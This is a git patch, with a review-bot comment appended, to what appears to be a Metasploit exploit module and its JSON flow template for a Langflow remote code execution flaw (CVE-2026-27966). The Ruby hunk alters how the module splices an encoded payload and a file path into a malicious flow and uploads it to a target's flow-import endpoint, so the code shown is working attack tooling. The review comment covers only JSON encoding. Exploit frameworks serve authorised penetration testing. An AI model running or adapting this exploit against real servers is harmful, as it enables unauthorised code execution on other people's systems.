From 3cfbb90b0f0c2cd930f6c725d032af7cde6a8c7f Mon Sep 17 00:00:00 2001
From: Takah1ro
Date: Fri, 17 Apr 2026 07:31:25 +0900
Subject: [PATCH] Fix bug
---
 data/exploits/CVE-2026-27966/cve_2026_27966.json | 8 ++------
 .../exploits/multi/http/langflow_rce_cve_2026_27966.rb | 3 ++-
 2 files changed, 4 insertions(+), 7 deletions(-)
diff --git a/data/exploits/CVE-2026-27966/cve_2026_27966.json b/data/exploits/CVE-2026-27966/cve_2026_27966.json
index b218bfef04..fa8c60d2b6 100644
--- a/data/exploits/CVE-2026-27966/cve_2026_27966.json
+++ b/data/exploits/CVE-2026-27966/cve_2026_27966.json
@@ -3,7 +3,6 @@
 "edges": [
 {
 "animated": false,
- "className": "",
 "data": {
 "sourceHandle": {
 "dataType": "CSVAgent",
@@ -33,7 +32,6 @@
 },
 {
 "animated": false,
- "className": "",
 "data": {
 "sourceHandle": {
 "dataType": "LanguageModelComponent",
@@ -61,7 +59,6 @@
 },
 {
 "animated": false,
- "className": "",
 "data": {
 "sourceHandle": {
 "dataType": "TextInput",
@@ -102,7 +99,7 @@
 "custom_fields": {},
 "description": "Runs a language model given a specified provider.",
 "display_name": "Language Model",
- "documentation": "https://docs.langflow.org/components-models",
+ "documentation": "",
 "edited": false,
 "field_order": [
 "provider",
@@ -118,7 +115,6 @@
 ],
 "frozen": false,
 "icon": "brain-circuit",
- "last_updated": "2026-04-06T03:01:27.454Z",
 "legacy": false,
 "metadata": {
 "dependencies": {
@@ -339,7 +335,7 @@
 "advanced": false,
 "display_name": "Ollama API URL",
 "dynamic": false,
- "info": "Endpoint of the Ollama API (Ollama only). Defaults to http://localhost:11434",
+ "info": "Endpoint",
 "input_types": [
 "Message"
 ],
diff --git a/modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb b/modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb
index 1a3b6db049..2ff2d79c60 100644
--- a/modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb
+++ b/modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb
@@ -132,11 +132,12 @@ class MetasploitModule < Msf::Exploit::Remote
 exploit_data = exploit_data.gsub('__FOLDERID__', @folder_id)
 exploit_data = exploit_data.gsub('__MODELNAME__', datastore['MODEL'])
 exploit_data = exploit_data.gsub('__OLLAMAAPIURI__', datastore['OLLAMAAPIURI'])
+ exploit_data = exploit_data.gsub('__FILEPATH__', path)
 exploit_data = exploit_data.gsub('__PAYLOAD__', payload.encode)
 exploit_data = exploit_data.gsub('__NAME__', rand_text_alphanumeric(8))
 # construct POST data
 data = Rex::MIME::Message.new
- data.add_part(exploit_data.to_json, 'application/json', nil, "form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(3..9)}.json\"")
+ data.add_part(exploit_data, 'application/json', nil, "form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(3..9)}.json\"")
 # Import a flow
 res = send_request_cgi({
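Review bot: The switch from `exploit_data.to_json` to `exploit_data` in the `data.add_part` call carries no comment explaining it, and the commit subject ("Fix bug") does not record the reason either. In the hunk `exploit_data` is reassigned from a chain of `gsub` calls, so it is a String, and calling `to_json` on it would have wrapped the whole template in a single JSON string literal; a comment such as `# exploit_data is already serialized JSON text; to_json would double-encode it` above the call would keep that from being reintroduced. `path` on the new `__FILEPATH__` line is defined outside the hunk, and the enclosing method starts and ends outside it, so the origin of that value cannot be checked from here. Because every value is spliced in as raw text, nothing visible guarantees that the document still parses as JSON after substitution.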